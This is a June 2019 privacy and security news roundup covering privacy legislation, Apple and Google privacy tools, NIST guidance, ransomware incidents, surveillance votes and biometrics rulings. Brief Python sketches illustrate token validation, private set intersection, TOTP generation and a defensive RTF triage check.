The Electronic Frontier Foundation revealed the three top priorities it believes should be included in proposed data privacy legislation. The first is to avoid federal preemption of stronger state privacy laws. The second is that legislation should empower consumers to file their own lawsuits against companies that violate their privacy rights. The third is to incorporate nondiscrimination rules to prevent pay-for-privacy schemes — consumers who choose more private options should receive the same goods, prices and quality as those who do not opt in to privacy options. Beyond these three priorities, EFF would like data privacy legislation to include the right to opt-in consent, the right to know, and the right to data portability. Conversely, EFF recommends against expanding the scope or penalties of computer crime laws, arguing that the existing laws are already too broad. [EFF.org]

Privacy Enhancing Technologies (PETs)

WW – Sign In with Apple Aims to Protect Users from Tracking

Apple has introduced a new privacy feature called Sign In with Apple, which uses Apple IDs rather than email addresses to verify credentials. Developers will be required to offer it as an option whenever they offer other third-party sign-ins, such as Google or Facebook. Users who want to adopt the feature will be required to add two-factor authentication to their Apple ID accounts. The feature is currently in limited beta. [www.wired.com: ‘Sign In with Apple’ Protects You in Ways Google and Facebook Don’t | www.cnet.com: Sign In with Apple will come to every iPhone app: How the new privacy login tool works | threatpost.com: Is ‘Sign in with Apple’ Marketing Spin or Privacy Magic? Experts Weigh In]
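
On the back end, the feature hands apps a signed JSON Web Token (an “identity token”) that the server validates against Apple’s published signing keys. Below is a hedged sketch of that server-side check in Python, assuming the PyJWT library (with its optional cryptography dependency); the client ID and token are placeholders, and details of the final API may differ from the beta.

    import jwt                      # PyJWT >= 2.0
    from jwt import PyJWKClient

    # Sketch: validate a Sign In with Apple identity token server-side.
    # Uses Apple's documented JWKS endpoint; audience is your app's
    # bundle ID. Not official Apple sample code.
    APPLE_JWKS_URL = "https://appleid.apple.com/auth/keys"

    def verify_identity_token(identity_token, client_id):
        signing_key = PyJWKClient(APPLE_JWKS_URL).get_signing_key_from_jwt(identity_token)
        return jwt.decode(
            identity_token,
            signing_key.key,
            algorithms=["RS256"],
            audience=client_id,                 # e.g. "com.example.myapp" (placeholder)
            issuer="https://appleid.apple.com",
        )

    # claims = verify_identity_token(token_from_client, "com.example.myapp")
    # claims["sub"] is the stable, app-scoped user identifier Apple returns.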

WW – Google Releases Open-Source Tool to Assist In Secure Data Sharing

Google announced it has launched an open-source tool to help organizations share information while respecting data subjects’ privacy rights. Private Join and Compute is a multiparty computation tool that uses a cryptographic protocol to let two parties encrypt the identifiers within their datasets and join them together. The parties can then compute over the joined data to learn useful information in aggregate. “All inputs (identifiers and their associated data) remain fully encrypted and unreadable throughout the process,” the company wrote in a blog post. “Neither party ever reveals their raw data, but they can still answer the questions at hand using the output of the computation. This end result is the only thing that’s decrypted and shared in the form of aggregated statistics.” [Google Blog | www.wired.com: Google Turns to Retro Cryptography to Keep Data Sets Private | www.theregister.co.uk: Google takes the PIS out of advertising: New algo securely analyzes shared encrypted data sets without leaking contents | www.zdnet.com: Google open sources Private Join and Compute, a tool for sharing confidential data sets]
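
The “join” half of the protocol can be illustrated with commutative blinding: each party raises the other’s hashed identifiers to its own secret exponent, so matching records end up with identical double-blinded values while the raw identifiers stay hidden. A toy Python sketch follows; the modulus is far too small for real use, and Google’s actual protocol additionally pairs each identifier with an additively homomorphic (Paillier-style) ciphertext so the values tied to matches can be summed, which this sketch omits.

    import hashlib
    import secrets

    # Toy commutative-blinding intersection (the "join" step only).
    # M127 is a known Mersenne prime; fine for a demo, useless for security.
    P = 2**127 - 1

    def h(identifier):
        """Hash an identifier into the multiplicative group mod P."""
        digest = hashlib.sha256(identifier.encode()).digest()
        return int.from_bytes(digest, "big") % P or 1   # avoid zero

    def blind(element, key):
        return pow(element, key, P)   # exponentiation commutes across keys

    a_key = secrets.randbelow(P - 3) + 2   # party A's secret exponent
    b_key = secrets.randbelow(P - 3) + 2   # party B's secret exponent

    party_a = {"alice@example.com", "bob@example.com"}    # made-up datasets
    party_b = {"bob@example.com", "carol@example.com"}

    # Each side blinds its own identifiers, exchanges them, and the other
    # side blinds them again; matches collide because blinding commutes.
    double_a = {blind(blind(h(x), a_key), b_key) for x in party_a}
    double_b = {blind(blind(h(y), b_key), a_key) for y in party_b}

    print("intersection size:", len(double_a & double_b))   # -> 1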

WW – Google’s G-Suite Confidential Mode Will Soon Be Enabled by Default

Starting in June, Google will enable confidential mode by default in its G Suite. The feature prevents users from forwarding, copying, or printing messages, and allows senders to set an expiration date for their messages. Confidential mode has been available in beta for several months. Admins will have the ability to disable the feature if they choose. [duo.com: Google Turning On Confidential Mode by Default in G Suite | gsuiteupdates.googleblog.com: Gmail confidential mode launching on by default]

US – Carnegie Mellon U Seeks Sponsors for Privacy Engineering Projects

As part of its privacy engineering master’s program, Carnegie Mellon University is seeking organizations that want to sponsor capstone projects in the fall. Small teams of students with technical backgrounds will work on the projects under the supervision of a faculty member beginning in August. Organizations are asked to specify a project of interest, a contact person to hold weekly virtual meetings with the team, and sponsorship funding. Students will produce a variety of deliverables, including a final report and presentation. Students from past projects have developed prototype software, industry practice surveys and feasibility studies. [CMU.edu]

RFID / IoT

US – NIST Issues Publication on IoT Security

The US National Institute of Standards and Technology (NIST) has published a paper that aims “to help federal agencies and other organizations better understand and manage the cybersecurity and privacy risks associated with their individual IoT devices throughout the devices’ lifecycles.” The paper, Considerations for Managing Internet of Things (IoT) Cybersecurity and Privacy Risks, is the foundational publication for what will be a series of publications that offer more specific aspects of managing IoT security. [Need more evidence that IoT security is a big deal? Here’s what NIST has to say | NIST: Considerations for Managing Internet of Things (IoT) Cybersecurity and Privacy Risks (abstract) | NIST: Considerations for Managing Internet of Things (IoT) Cybersecurity and Privacy Risks]

Security

US – Ransomware Cases Becoming Public

More ransomware stories are becoming public.

  • Georgia: The Administrative Office of the Georgia Courts disclosed its systems were infected with ransomware. [Ars Technica | Wired]
  • Lake City FL: Officials in Lake City, Florida, have fired an IT employee after the city’s insurance paid nearly $500,000 in ransom to regain its data. [ZDNet | New York Times | SC Magazine | Cyberscoop]
  • Baltimore: Officials have authorized US $10 million to pay for expenses from a ransomware attack that hit the city in May. The attackers asked for $80,000 but the city chose not to pay on the advice of law enforcement. [SC Magazine]

Read more:

  • zdnet.com: Ransomware attacks: Why and when it makes sense to pay the ransom
  • forrester.com: Unconventional Wisdom: Explore Paying The Ransom In Parallel With Other Recovery Options
  • washingtonpost.com: Hackers are taking cities hostage. Here’s a way around it.

US – Senate Issues Report on Federal Cybersecurity

A US Senate report examined the cybersecurity compliance of eight federal agencies as documented in 10 years’ worth of reports from their respective Inspectors General. The report investigated compliance at the Department of Homeland Security (DHS) as well as at seven agencies that the Office of Management and Budget (OMB) rated lowest on cybersecurity. The report concluded that “the federal government remains unprepared to confront the dynamic cyberthreats of today.” [www.theregister.co.uk: Stop us if you’ve heard this one: US government staff wildly oblivious to basic computer, info security safeguards | www.zdnet.com: Report shows failures at eight US agencies in following cyber-security protocols | www.cyberscoop.com: Senate investigation finds agencies ‘unprepared’ to protect Americans’ data | www.portman.senate.gov: Federal Cybersecurity: America’s Data at Risk]

US – NIST Updates SP 800-171 to Help Defend Sensitive Information

National Institute of Standards and Technology’s [NIST] information security document “Draft NIST Special Publication (SP) 800-171 Revision 2: Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations” [see here] offers strategies to help protect sensitive information that is stored in computers supporting critical government programs and high value assets. It now has a companion document, “NIST SP 800-171B: Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations: Enhanced Security Requirements for Critical Programs and High Value Assets” [see here], with additional recommendations for handling Controlled Unclassified Information [CUI] in situations where that information runs a higher than usual risk of exposure. The companion does not alter the original guidance but simply provides additional tools to help deal with what are considered “advanced persistent threats” — those adversaries who possess the expertise and resources to play the long game of cyber warfare. They often attempt to establish long-term footholds within a target’s infrastructure to steal information or undermine critical aspects of its mission, sometimes years after the initial breach. NIST is accepting comments on both SP 800-171 Rev. 2, which received minor editorial updates, and SP 800-171B until July 19, 2019. In addition, a previously available companion document, “NIST SP 800-171A: Assessing Security Requirements for Controlled Unclassified Information” [see here], will be updated with new assessment procedures for the enhanced security requirements. The requirements in SP 800-171B are largely drawn from two other draft publications, NIST SP 800-160 Vol. 2 [here] and NIST SP 800-53 Rev. 5 [here & 494 pg PDF], both of which NIST is developing to help engineer security into information systems. Recognizing that many contractors do not have the in-house resources to implement the requirements fully, the revised draft indicates how an organization might use appropriate third-party contractors to perform specific tasks, such as evaluating an organization’s resiliency to cyberattack or providing a Security Operations Center capability. [News & Events (National Institute of Standards and Technology)]

US – Wyden to NIST: Publish Guidance for Secure Data Sharing

US Senator Ron Wyden (D-Oregon) wants the National Institute of Standards and Technology (NIST) to develop and publish guidance to help “individuals and organizations… securely share sensitive data over the Internet.” Wyden notes that government agencies often send sensitive data in emailed .zip files and via other insecure methods. [www.cyberscoop.com: How secure is that .zip file? One senator is urging NIST to weigh in | www.theregister.co.uk: If Uncle Sam could quit using insecure .zip files to swap info across the ‘net, that would be great, says Silicon Ron Wyden | www.wyden.senate.gov: Letter to NIST Director]

US – NIST Releases Guidelines for Building Secure Software

The National Institute of Standards and Technology has released a draft document, Mitigating the Risk of Software Vulnerabilities by Adopting a Secure Software Development Framework (SSDF), which “facilitates communications about secure software development practices amongst business owners, software developers, and cybersecurity professionals within an organization.” The framework involves principles for software preparation, protection, creation and vulnerability response. “Following these practices should help software producers reduce the number of vulnerabilities in released software, mitigate the potential impact of the exploitation of undetected or unaddressed vulnerabilities, and address the root causes of vulnerabilities to prevent future recurrences,” NIST wrote in the framework. “Software consumers can reuse and adapt the practices in their software acquisition processes.” The guidelines also feature a call for the creation of a bill of materials that will help expedite vulnerability patches. The framework will be open for public comment until Aug. 5. [www.nextgov.com: NIST Asks for Input on Building Secure Software | csrc.nist.gov: Mitigating the Risk of Software Vulnerabilities by Adopting a Secure Software Development Framework (SSDF)]
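
The bill-of-materials idea the draft mentions is easy to picture: enumerate exactly which components a deployment ships, so that a disclosed vulnerability can be traced to affected software quickly. Here is a toy Python sketch that lists a running environment’s installed packages as a minimal inventory; real SBOMs use standardized formats such as SPDX or CycloneDX, which this deliberately ignores.

    import json
    from importlib import metadata

    # Toy software inventory: name and version of every installed Python
    # distribution in the current environment. A stand-in for a real SBOM.
    sbom = [
        {"name": dist.metadata["Name"], "version": dist.version}
        for dist in metadata.distributions()
    ]
    print(json.dumps(sorted(sbom, key=lambda c: str(c["name"])), indent=2))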

WW – Microsoft Will Require Multi-Factor Security for Cloud Solution Providers

Microsoft has updated its Partner Security Requirements. The company will require all Cloud Solution Providers (CSPs) that help organizations manage their Office365 accounts to use multi-factor authentication. When Office365 licenses are purchased from a reseller partner, that partner must have administrative privileges to help with setup. Customers have the option of removing that initial admin account afterward. Some organizations use a CSP to get better pricing than they would if they purchased the licenses directly from Microsoft, and they may not be aware that the CSP retains the administrative account. [docs.microsoft.com: Partner Security Requirements | krebsonsecurity.com: Microsoft to Require Multi-Factor Authentication for Cloud Solution Providers]
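
For context on what the requirement involves: multi-factor authentication on accounts like these typically adds a time-based one-time password (TOTP) on top of the normal credential. A minimal RFC 6238 generator in Python, for illustration only — Microsoft’s rule is about enabling MFA on partner tenants, not about any particular implementation, and the shared secret below is a demo value.

    import base64
    import hashlib
    import hmac
    import struct
    import time

    # Minimal RFC 6238 TOTP: HMAC-SHA1 over the current 30-second counter,
    # dynamically truncated to a 6-digit code.
    def totp(secret_b32, interval=30, digits=6):
        key = base64.b32decode(secret_b32)
        counter = struct.pack(">Q", int(time.time()) // interval)
        mac = hmac.new(key, counter, hashlib.sha1).digest()
        offset = mac[-1] & 0x0F
        code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % 10**digits
        return str(code).zfill(digits)

    print(totp("JBSWY3DPEHPK3PXP"))   # demo secret, not a real credential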

WW – Survey: Human Error Remains Top Cause of Data Breaches

In a Shred-it survey done by Ipsos, 53% of C-suite executives and 28% of small business owners cite human error or accidental loss by an outside party as the leading causes of data breaches. The survey also showed 47% of C-suites and 31% of SBOs believe the human error and accidental loss stem from someone within the affected organization. “For the second consecutive year, employee negligence and collaboration with external vendors [continue] to threaten the information security of U.S. businesses,” Stericycle Senior Vice President Ann Nickolas said. “The consequences of a data breach are extensive and are not limited to legal, financial and reputational damage.” Meanwhile, WatchGuard Technologies Senior Security Researcher Marc Laliberte wrote for Help Net Security on why businesses need to be up to date on how to spot and respond to phishing attacks. [Help Net Security]

US – Enterprises Won’t Act on Fears of Data Security, Lack Funds: Survey

An Ensighten survey of 200 marketing, security, information technology and corporate professionals revealed a staggering gap between concern about data breaches and action taken to prevent them. Nearly 90% of respondents said the recent increase in breaches concerns them, and 98% would like to bolster security to avoid data exposures. However, only 34.5% have acted on those fears by implementing safeguards for customer data. The inaction stems largely from insufficient funding: 79% of respondents said their organization is given less than $500,000 annually to address security needs. [MarTech Advisor]

US – Years of Call Records Stolen from Cell Networks

Over the last seven years, hackers have attacked at least 10 cell networks in what security researchers are calling “massive-scale” espionage. Researchers at Boston-based Cybereason first discovered the attacks in 2018. The hackers have obtained vast amounts of call records on at least 20 targeted individuals, including dates, times and locations of the calls. Researchers found the hackers broke into cell providers, one after the other, in an attempt to obtain and download rolling records on the target, avoiding having to deploy malware on the target’s individual devices. As the attacks are ongoing, researchers will not publicly identify the cell networks or targeted individuals. [TechCrunch]

US – Traveler and License Plate Images Stolen from Customs and Border Protection Contractor’s Network

US Customs and Border Protection (CBP) has acknowledged that hackers broke into the IT systems of a third-party contractor and stole photos of people and images of license plates. CBP uses cameras and video recordings at airports and at land border crossings. CBP said that it learned of the breach in late May; the contractor, who has not been identified, had copied the images to its own network, which was then breached. [www.wired.com: Hackers Stole a Border Agency Database of Traveler Photos | www.washingtonpost.com: U.S. Customs and Border Protection says photos of travelers were taken in a data breach | www.theregister.co.uk: US border cops confirm: Maker of America’s license-plate, driver recognition tech hacked, camera images swiped]

WW – Spam Campaign Exploits Known Flaw in Microsoft Office

Microsoft has warned of a spam campaign that uses maliciously crafted RTF documents. Once opened, the documents infect computers with no additional user interaction. The spam email is being sent in several different European languages. The malicious documents exploit a known vulnerability for which Microsoft released a patch in November 2017. [www.threatpost.com: Microsoft Warns of Email Attacks Executing Code Using an Old Bug | www.zdnet.com: Microsoft warns about email spam campaign abusing Office vulnerability | www.bleepingcomputer.com: Microsoft Issues Warning on Spam Campaign Using Office Exploits | www.microsoft.com: CVE-2017-11882 | Microsoft Office Memory Corruption Vulnerability]
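
Because the exploited component is the old Equation Editor, mail-gateway triage can be as blunt as quarantining RTF attachments that embed an OLE object referencing it. A rough heuristic sketch in Python follows; the markers are assumptions about typical samples (real ones are heavily obfuscated), so treat this as a flag-for-analysis filter, never as detection, and patching remains the actual fix.

    import sys

    # Crude triage for RTF files possibly targeting CVE-2017-11882.
    # Looks for the RTF magic, an embedded OLE object, and the Equation
    # Editor class name in plain or hex-encoded form. Heuristic only.
    EQUATION_HEX = "Equation".encode().hex().encode()   # as it may appear in \objdata

    def looks_suspicious(path):
        data = open(path, "rb").read()
        is_rtf = data.lstrip().startswith(b"{\\rtf")
        has_object = b"\\object" in data                # embedded OLE object
        names_equation = b"Equation" in data or EQUATION_HEX in data.lower()
        return is_rtf and has_object and names_equation

    if __name__ == "__main__":
        for path in sys.argv[1:]:
            print(path, "SUSPICIOUS" if looks_suspicious(path) else "ok")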

WW – Google Announces Fix for Bug Used in Nest Cameras

Google has fixed an issue that allowed previous owners of Nest security cameras to continue to view a feed from the device, even after deregistering it from their account and without the new owner’s knowledge. The issue affects Nest cameras connected to third-party partner services via Works with Nest. Last month, Google announced it was discontinuing the Works with Nest program in an effort to prevent third-party devices from accessing data captured by Nest devices. The fix updates devices automatically. This is the second privacy issue to hit Google’s Nest division this year: in February, the company did not disclose that the Nest Secure home security system included an on-device microphone. [The Verge]

WW – Privacy and Consent Updates for Adobe Cloud

Crownpeak has revealed a new extension for Launch, Adobe’s cloud-platform tag-management facility, designed to help marketers simplify compliance with global privacy laws. The extension allows users of Crownpeak’s Universal Consent Platform to integrate consent management directly with the Adobe platform. Marketers will be able to add prebuilt banners to websites that give users control over privacy settings. In addition to the new Launch extension, the Universal Consent Platform now includes real-time scanning, which provides up-to-date data collected from site visitors. [Yahoo Finance]

Smart Cities

CA – Sidewalk Labs Makes Data Privacy Commitment in Toronto Smart-City Plan

Following ongoing backlash from privacy advocates, Sidewalk Labs has confirmed it will not sell advertisers the personal data collected from its Sidewalk Toronto smart-city project. Sidewalk, a subsidiary of Alphabet, formalized its pledge to data privacy in the master plan for Sidewalk Toronto released Monday. In addition to refraining from selling personal data, Sidewalk CEO Dan Doctoroff said his company will not disclose personal information to third parties without explicit consent. The project has been scrutinized for its use of sensors, which critics believe opens the door to improper data collection and heightened surveillance. [Reuters | Sidewalk Labs unveils $1.3-billion plan for Toronto’s waterfront, revealing a vision much larger than initially proposed | Sidewalk Labs decision to offload tough decisions on privacy to third party is wrong, says its former consultant | Google’s Sidewalk’s bet is a nightmare for the privacy conscious | Sidewalk Labs’ proposed plan for Toronto’s waterfront: Everything you need to know | Sidewalk Labs could make Toronto a world leader in urban tech | Five potential sticking points in Sidewalk Labs’ masterplan for the Toronto waterfront | Did Sidewalk Labs’ overstep with their masterplan? It certainly raised concerns at Waterfront Toronto | In ethics report, NDP calls on Ottawa to halt Sidewalk Labs commitments pending further consultations | Ann Cavoukian still has problems with Sidewalk Labs’ approach to data with Quayside]

Surveillance

US – House Votes Against Curtailing Warrantless Collection of Americans’ Data

Due to opposition from national security hawks, the US House voted 175-253 [see roll call of votes here] against an amendment introduced by two pro-privacy lawmakers, Reps. Justin Amash [R-Mich. here] and Zoe Lofgren [D-Calif. here], that would have curtailed a controversial surveillance authority, Section 702 of the Foreign Intelligence Surveillance Act (FISA) [see 4 pg PDF overview here also EFF here & BCFJ here], which allows the U.S. government to collect communications from foreigners located outside of the U.S. In April 2019, the Office of the Director of National Intelligence said U.S. intelligence agencies conducted 9,637 queries for search terms concerning a U.S. person in 2018. The Amash-Lofgren amendment [read 1 pg PDF here] would have barred the government from collecting communications on Americans under FISA without a warrant. The lawmakers tried to pass the measure as part of an appropriations bill [H.R. 2740 see here] that funds several federal departments, including the Labor Department, Department of Health and Human Services and the Department of Defense. Forty-two civil society groups signed onto a letter in support of the Amash-Lofgren amendment, writing that it would “significantly advance the privacy rights of people within the United States.” Digital rights group Fight for the Future wrote: “We just got handed a potentially historic opportunity to finally close the gaping loopholes in Section 702 of the FISA Amendments Act that the National Security Agency abuses to conduct warrantless dragnet surveillance of our Internet activity, email, text messages, etc.” [read here] After the vote, the group pointed out that more Democrats had voted against the amendment than Republicans: “It’s good to know that House Democrats like Adam Schiff are ‘resisting’ Trump by voting to ensure that he has limitless authority to conduct mass warrantless surveillance” [read PR here]. Fight for the Future Deputy Director Evan Greer said: “The Democrats who voted against this common sense amendment just threw immigrants, LGBTQ folks, activists, journalists, and political dissidents under the bus.” On the House floor earlier on Tuesday, Amash said Republicans’ and Democrats’ resistance to reforming Section 702 exemplifies “what’s wrong with Washington.” [watch here] Congress last year reauthorized Section 702 of FISA with few alterations after a bitter battle between privacy activists and security hawks in both chambers. [The Hill | House Votes Down Amash’s Attempt To Stop Warrantless FISA Surveillance | House votes down amendment to ban warrantless spying on Americans | Critics Lament as 126 House Democrats Join Forces With GOP to Hand Trump ‘Terrifying’ Mass Domestic Spying Powers]

WW – Study: Monitoring Patient Social Media Accounts for Evidence of Disease

A new study from a group of researchers at the University of Pennsylvania Perelman School of Medicine found social media data outperformed demographic data in predicting diseases such as diabetes, anxiety and depression. The study’s authors believe doctors could better diagnose and treat diseases if they had access to a patient’s social media accounts. The study analyzed the social media accounts of nearly 1,000 patients with their consent. While researchers anonymized the individuals’ identities, privacy advocates are concerned about the risks of linking health care records with social media data. “If health records and social media data start to become more routinely linked, the privacy risks could be far more significant,” Open Rights Group Legal Officer Amy Shepherd said. [Vice.com]

UK – Civil Rights Group Challenges UK Government’s Data Surveillance Practices

Liberty, a U.K. civil rights group, has made a claim to the High Court regarding the U.K. government’s alleged unlawful, broad use of the Investigatory Powers Act. The law allows the government to collect surveillance data from the majority of U.K. citizens, including individuals who are not suspected of any wrongdoing. Liberty alleges the IPA’s collection powers go against the European Convention on Human Rights. “These powers permit the interception or obtaining, processing, retention and examination of the private information of very large numbers of people — in some cases, the whole population,” Liberty Barrister Martin Chamberlain said. Government lawyers are prepared to argue that their methods do not pose a risk of an invasion of privacy based on the limited use of the data. [BBC News]

WW – Google Apps Found to Contain Insidious Adware

Adware found in nearly 240 Android apps in the Google Play store delivers out-of-app ads, displaying them on devices’ lock screens and launching audio and video advertisements even when a device is asleep. The problematic apps are all from a single publisher, and the adware was well-hidden within each. The affected apps have been either removed from the Google Play store or updated to clean versions. [arstechnica.com: 238 Google Play apps with >440 million installs made phones nearly unusable | www.darkreading.com: Adware Hidden in Android Apps Downloaded More Than 440 Million Times]

Telecom / TV

US – Groups Claim Unlawful Location Sharing By Phone Carriers

Public interest groups have filed a complaint with the U.S. Federal Communications Commission alleging that wireless carriers broke privacy laws by sharing customer location data without consent. Wireless providers AT&T, Verizon, Sprint and T-Mobile told the FCC last month that they had ended their third-party sharing. “The wireless carriers have been engaging in serious violations of their customers’ privacy. But the law is clear on this issue: wireless carriers need consent from their customers before they can disclose customer location data to third parties,” New America’s Open Technology Institute Senior Counsel Eric Null said in a statement. “The carriers’ practices have been public for over a year now, and the FCC has been asleep at the wheel. The wireless carriers have violated the law, it’s time to hold them accountable.” [The Hill]

US – FTC Clamping Down on Illegal Robocalls

The U.S. Federal Trade Commission and its law enforcement partners have announced the launch of “Operation Call it Quits,” which sets out to address the growing issue of illegal robocalls. The joint venture has already rolled out 94 actions against operations involving the fake, pre-recorded nuisance calls and telemarketing scams. The total number of FTC actions against robocallers and Do Not Call violators stands at 145. “We’re all fed up with the tens of billions of illegal robocalls we get every year,” FTC Bureau of Consumer Protection Director Andrew Smith said. “Today’s joint effort shows that combatting this scourge remains a top priority for law enforcement agencies around the nation.” [FTC.gov]

US Government Programs

US – PCLOB: Oversight Bodies Need to Keep Up With Government’s Data-Gathering Capabilities

In an op-ed for The Hill, U.S. Privacy and Civil Liberties Oversight Board Chairman Adam Klein and board members Edward Felten and Jane Nitze write about how legislators and oversight bodies need to keep up with the government’s increased ability to gather information. “The glut of data produced by a digitized society will require legislators and oversight bodies to re-think, or at least supplement, the law’s traditional focus on limits to the government’s ability to acquire information,” the PCLOB members write. “Legislators and oversight entities … must take stock of the full life cycle of data gathered by the government, examine how agencies use the data they have in addition to confirming that it was lawfully acquired.” [The Hill]

US – Senate Report Criticizes Federal Agencies’ Data Protection Track Record

A report published by the U.S. Senate Committee on Homeland Security and Governmental Affairs shows several government agencies have not effectively protected the personal data of U.S. citizens over the last decade. The report reveals the findings of a review of inspector general reports from the last 10 years at the Departments of Homeland Security, State, Transportation, Housing and Urban Development, Agriculture, Health and Human Services, Education and the Social Security Administration. In a statement, Senate Homeland Security Committee’s Subcommittee on Investigations Chairman Rob Portman, R-Ohio, said, “The federal government can and must do a better job of shoring up our defenses against the rising cybersecurity threats.” [ABC News]

US – Calif. Approves Audit of License Plate Reader Use by Law Enforcement

A California legislative committee approved a sweeping inquiry into law enforcement’s use of license plate readers. The Electronic Frontier Foundation and American Civil Liberties Union initiated the audit request after investigations uncovered security flaws with law enforcement cameras. Democratic State Sen. Scott Wiener said the audit is not intended to ban the technology but to investigate reports that license plate data is being given to U.S. Immigration and Customs Enforcement officials. In a public records request, the ACLU found ICE has access to license plate data maintained by Vigilant Solutions. The audit will focus on five agencies in Los Angeles, Sacramento and Fresno and is expected to be completed within seven months. [Courthouse News Service]

US Legislation

US – Nine States Pass New And Expanded Data Breach Notification Laws

In the absence of federal action, states have been actively passing new and expanded requirements for privacy and cybersecurity (see some examples here and here). While laws like the California Consumer Privacy Act (CCPA) are getting all the attention, many states are actively amending their breach notification laws. Illinois, Maine, Maryland, Massachusetts, New Jersey, New York, Oregon, Texas, and Washington have all amended their breach notification laws to either expand their definitions of personal information or to add new reporting requirements. The blog post cited below provides an informative roundup of these recent state law changes:

  1. Illinois (SB 1624) – Illinois proposes notification requirements to the Attorney General;
  2. Maine (LD 946) – Maine places new restrictions on internet service providers (ISPs);
  3. Maryland (HB 1154) – Maryland imposes new requirements on entities following a security breach;
  4. Massachusetts (HB 4806) – Massachusetts expands data breach notification obligations;
  5. New Jersey (S. 52) – New Jersey expands the definition of personal information and modifies notification standards;
  6. New York (SB 5575B) – New York expands the scope of protection under the law and establishes standards for businesses to protect consumer information;
  7. Oregon (SB 684) – Oregon expands the scope of protected data and notification requirements for vendors;
  8. Texas (HB 4390) – Texas adds definitive notification timeline and establishes an advisory council; and
  9. Washington (HB 1071) – Washington expands the definition of personal information and sets new notification requirements. [Data Protection Report (Norton Rose Fulbright)]

US – Legislation Seeks to Regulate Privacy and Security of Wearables and Genetic Testing Kits

On June 14, Senators Amy Klobuchar [D-MN] and Lisa Murkowski [R-AK] introduced the Protecting Personal Health Data Act [see PR & Bill S.1842], which would provide new privacy and security rules from the Department of Health and Human Services (HHS) for technologies that collect personal health data, such as wearable fitness trackers, social-media sites focused on health data or conditions, and direct-to-consumer genetic testing services, among other technologies. It would direct the HHS Secretary to issue regulations relating to the privacy and security of health-related consumer devices, services, applications, and software. These regulations would also cover a new category of personal health data that is otherwise not protected health information under HIPAA. The bill is particularly notable for three reasons:

  1. it would incorporate consumer rights concepts from the EU General Data Protection Regulation (GDPR), such as an individual’s right to delete and amend her health data, as well as a right to access a copy of personal health data, at the U.S. federal level;
  2. it does not contemplate situations where entities are required to retain personal health data under other regulations (though the bill includes an exception for entities covered under the Health Insurance Portability and Accountability Act); and
  3. it requires that HHS establish a national health task force to provide reports to Congress, and it specifies that any other federal agency guidance or published resources to help protect personal health data must be consistent with the HHS Secretary’s rules under this bill; this may reflect an expansion of HHS’s authority to set rules and standards for health data previously regulated by other federal agencies (such as the Federal Trade Commission (FTC)).

The bill would require HHS, in consultation with the FTC and other relevant stakeholders, to promulgate regulations that “strengthen privacy and security protections for consumers’ personal health data” collected, processed, analyzed, or used by health-related consumer devices, services, applications, and software. A companion bill has not yet been introduced in the House of Representatives. California is also considering a bill that would expand California’s health privacy law to include any information in possession of or derived from a digital health feedback system, which is broadly defined to include sensors, devices, and internet platforms connected to those sensors or devices that receive information about an individual [see AB-384: Information privacy: digital health feedback systems here] [Inside Privacy (Covington) | Klobuchar, Murkowski Introduce Bill to Protect Consumer Health Data Privacy | Klobuchar, Murkowski introduce legislation to protect consumer health data]

US – Sen. Markey: COPPA in Need of Update, Increased Age Requirement

The Wall Street Journal reports on the origins of the Children’s Online Privacy Protection Act, which the original architect, U.S. Sen. Ed Markey, D-Mass., believes needs to have its minimum age requirement raised. Markey, who helped send COPPA into force in 1998, sought to have websites require parental consent for users ages 16 and younger before lawmakers settled on under age 13. “It was too young and I knew it was too young then,” Markey said. “It was the best I could do.” Markey and Sen. Josh Hawley, R-Mo., introduced “COPPA 2.0” in March, calling for the age requirement to be bumped to age 16. Common Sense Media Founder and CEO Jim Steyer said COPPA is “hopelessly outdated” and that overhauling the law will be a tough sell considering societal norms and data value related to kids on the internet. [WSJ.com]

Workplace Privacy

EU – CNIL Fines Company 20K Euros for Illicit Employee Surveillance

France’s data protection authority, the CNIL, fined Uniontrad Company 20,000 euros for the video surveillance systems it set up to monitor its employees. Staff members filed complaints with the CNIL between 2013 and 2017 over the filming. The CNIL conducted an investigation in February 2018, when it found the cameras not only recorded employees’ activities continuously, but staff members were also never told exactly what was chronicled. The CNIL ordered Uniontrad to change its practices; however, a second audit in October 2018 found the company had not taken any action for the violations. Uniontrad has a two-month period to remedy its surveillance practices or face a 200 euro fine for each day it remains in noncompliance. [CNIL.fr]

+++

1-15 June 2019

Biometrics

US – Federal Law Trumps State Biometric Privacy Law; BIPA Appeal Thrown Out

On June 13, the U.S. Seventh Circuit Court of Appeals ruled [read ruling summary & 13 pg PDF ruling] that airlines are exempt from Illinois’ Biometric Information Privacy Act [BIPA], which requires explicit informed consent from employees for the use of their biometrics in time and attendance systems, because the act is outranked by federal law governing airline labor relations. Plaintiffs in the case sought a class action against Southwest Airlines, which was previously thrown out at the District Court level. In the unanimous opinion of the three-judge appeals panel, the union holds status under federal law as a legally authorized representative for airline workers. State law cannot remove biometric collection consent from the union’s agreement with the airline, and BIPA does not attempt to do so, according to the ruling. “That biometric information concerns workers’ privacy does not distinguish it from many other subjects, such as drug testing, that are routinely covered by collective bargaining and on which unions give consent on behalf of the whole bargaining unit,” Judge Frank Easterbrook wrote. Easterbrook also noted that the collective bargaining agreement between the union and the airline could itself involve a BIPA violation, but that would be a matter for the dispute mechanisms outlined in the agreement. Southwest will presumably use the same defense in a separate BIPA lawsuit brought against it in August of 2018 [read coverage]. [Biometric Companies | Appeals panel: Federal law trumps state privacy law in class actions vs airlines over fingerprint scans]

US – Group Launches Protest Against Airlines Using Facial Recognition

Privacy activists initiated a campaign calling out airlines that use facial-recognition technology to scan passengers in coordination with U.S. Customs and Border Protection. The group, Fight for the Future, hopes to encourage passengers to fly on airlines that do not use the technology. Despite assurances the program is only used to identify non-U.S. citizens who have overstayed their visas, the group is concerned the lack of federal regulations may lead to overreach. Currently, U.S. citizens can opt out of the program, although few do so, according to the airlines. The campaign comes just days after the CBP said the technology is not a surveillance program. [The Hill]

US – Calif. Senate Dems Vote to Ban Facial-Recognition Tech in Body Cameras

California Senate Democrats voted to ban the use of facial-recognition technology in body cameras used by law enforcement. The bill cleared the state Assembly last month and will see a final vote in the state Senate in the summer. Assembly Bill 1215 passed without any Republican votes in the Assembly before being passed through the state Senate committee. “What we don’t want is for communities to feel like they’re under surveillance 24 hours, 7 days a week when the officers’ body cameras are being worn,” said Assemblyman Phil Ting, D-Calif., who authored the bill. Meanwhile, the Financial Times reports on technology created to track eye movement. [Courthouse News Service]

